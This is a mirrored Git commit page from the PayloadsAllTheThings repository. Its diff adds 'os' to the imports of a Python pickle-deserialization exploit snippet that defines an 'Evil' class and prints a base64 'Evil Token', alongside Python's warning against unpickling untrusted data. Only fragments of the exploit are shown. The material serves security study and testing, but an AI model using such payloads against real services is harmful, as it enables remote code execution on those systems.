mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
import os
This commit is contained in:
parent
d40e055629
commit
df8493e4e6
@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
|
|||||||
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
|
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import cPickle
|
import cPickle, os
|
||||||
from base64 import b64encode, b64decode
|
from base64 import b64encode, b64decode
|
||||||
|
|
||||||
class Evil(object):
|
class Evil(object):
|
||||||
@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
|
|||||||
## References
|
## References
|
||||||
|
|
||||||
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
|
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
|
||||||
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
||||||
|
Loading…
Reference in New Issue
Block a user